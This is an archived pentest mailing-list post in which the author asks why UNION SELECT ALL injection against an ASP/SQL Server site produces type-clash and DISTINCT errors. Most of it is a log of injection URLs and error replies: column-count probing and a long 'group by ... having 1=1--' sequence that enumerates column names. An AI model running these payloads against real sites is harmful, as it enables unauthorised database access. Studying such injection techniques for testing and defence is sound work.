Home page logo
/

pen-test logo Penetration Testing mailing list archives

SQL Injection: Issue with UNION SELECT ALL
From: Joseph McCray <joe () learnsecurityonline com>
Date: Wed, 09 Jan 2008 07:00:23 -0500

I'm really having some trouble here understanding and working through
these 2 errors I am getting when attacking a host via SQL Injection
using a UNION SELECT ALL statement. I've listed the what I think are
relevant references I've found on the Internet about these error
messages so far, and even though this is probably really simple but for
some reason it's just not clicking for me.

1. Operand type clash: text is incompatible with int
        Reference Found:
        http://archives.neohapsis.com/archives/sf/pentest/2003-02/0094.html

2. The text, ntext, or image data type cannot be selected as DISTINCT.
        References Found:
        http://sla.ckers.org/forum/read.php?16,14370,14372 <-- I am using UNION
SELECT ALL

        http://p2p.wrox.com/topic.asp?whichpage=1&TOPIC_ID=7662&#73864 


http://www.thedatafarm.com/blog/2005/07/12/SELECTsUNIONsAndNtextColumns.aspx <-- I am using UNION SELECT ALL
        
        http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=530757&SiteID=1 


The site was vulnerable to login bypass, so it's really not a matter of
being able to "get in", I am asking for help because I want to
understand the errors, and of course make my attack process better. 



############################################
# Can't Figure Out This UNION SELECT Stuff #
############################################
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT
ALL 1--
        Returns:
        All queries in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT
ALL 1,2--
        Returns:
        All queries in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT
ALL 1,2,3--
        Returns:
        Operand type clash: text is incompatible with int

        Reference Found:
        http://archives.neohapsis.com/archives/sf/pentest/2003-02/0094.html


So I tried this:
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT
ALL null--
        Returns:
        All queries in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT
ALL null,null--
        Returns:
        All queries in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 UNION SELECT
ALL null,null,null--
        Returns:
        The text, ntext, or image data type cannot be selected as DISTINCT.


        References Found:
        http://sla.ckers.org/forum/read.php?16,14370,14372 <-- I am using UNION
SELECT ALL

        http://p2p.wrox.com/topic.asp?whichpage=1&TOPIC_ID=7662&#73864 <-- I am
using UNION SELECT ALL


http://www.thedatafarm.com/blog/2005/07/12/SELECTsUNIONsAndNtextColumns.aspx <-- I am using UNION SELECT ALL
        
        http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=530757&SiteID=1
<-- Hmmm...Need to get a grip on this.




#####################################
# Table/Column Name Enum works fine #
#####################################
http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345
        Returns: 
        Valid page


http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345&apos;
        Returns: 
        Microsoft OLE DB Provider for SQL Server error '80040e14' 
        Unclosed quotation mark before the character string ''.


http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 having 1=1--
        Returns:
        Column 'a.id' is invalid in the select list because it is not contained
in an aggregate function and there is no GROUP BY clause.


http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by a.id
having 1=1--
        Returns:
        Column 'a.Title' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause


http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title having 1=1--
        Returns:
        Column 'a.Content' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause.


http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content having 1=1--
        Returns:
        Column 'a.priority' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause.


http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority having 1=1--
        Returns:
        Column 'a.html' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause.


http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html having 1=1--
        Returns:
        Column 'a.link' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause.


http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link having 1=1--
        Returns:
        Column 'a.url' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url having 1=1--      
        Returns:
        Column 'a.parent' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent having
1=1--
        Returns:
Column 'a.static_index' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index having 1=1--
        Returns:
        Column 'a.hidden' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden having 1=1--
        Returns:
        Column 'a.approved' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved having 1=1--
        Returns:
        Column 'a.AutoApprove' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved,a.AutoApprove having 
1=1--
        Returns:
        Column 'a.AutoDisapprove' is invalid in the select list because it is
not contained in either an aggregate function or the GROUP BY clause.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved,a.AutoApprove,a.AutoDisapprove
 having 1=1--
        Returns:
        Column 'a.lvl' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved,a.AutoApprove,a.AutoDisapprove,a.lvl
 having 1=1--
        Returns:
        Column 'a.membertypes' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved,a.AutoApprove,a.AutoDisapprove,a.lvl,a.membertypes
 having 1=1--
        Returns:
        Column 'a.lastupdated_time' is invalid in the select list because it is
not contained in either an aggregate function or the GROUP BY clause.



http://www.vulnerablesite.com/vulnpage.asp?vulnparam=12345 group by
a.id,a.Title,a.Content,a.priority,a.html,a.link,a.url,a.parent,a.static_index,a.hidden,a.approved,a.AutoApprove,a.AutoDisapprove,a.lvl,a.membertypes,a.lastupdated_time
 having 1=1--
        Returns:
        You have submitted an invalid keyword(s).
Please contact CompanyXYZ support if you had the need to use those
keyword(s)...


Microsoft VBScript runtime error '800a01a8'

Object required: 'getrecordset(...)' 




You have submitted an invalid keyword(s).
Please contact CompanyXYZ support if you had the need to use those
keyword(s)...


Microsoft VBScript runtime error '800a01a8'

Object required: 'getrecordset(...)' You have submitted an invalid
keyword(s).
Please contact CompanyXYZ support if you had the need to use those
keyword(s)...


Microsoft VBScript runtime error '800a01a8'

Object required: 'getrecordset(...)' 





        

-- 
Joe McCray
Toll Free:  1-866-892-2132
Email:      joe () learnsecurityonline com
Web:        https://www.learnsecurityonline.com


Learn Security Online, Inc.

* Security Games        * Simulators
* Challenge Servers     * Courses
* Hacking Competitions  * Hacklab Access

"The only thing worse than training good employees and losing them 
is NOT training your employees and keeping them." 

        - Zig Ziglar

Attachment: signature.asc
Description: This is a digitally signed message part


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]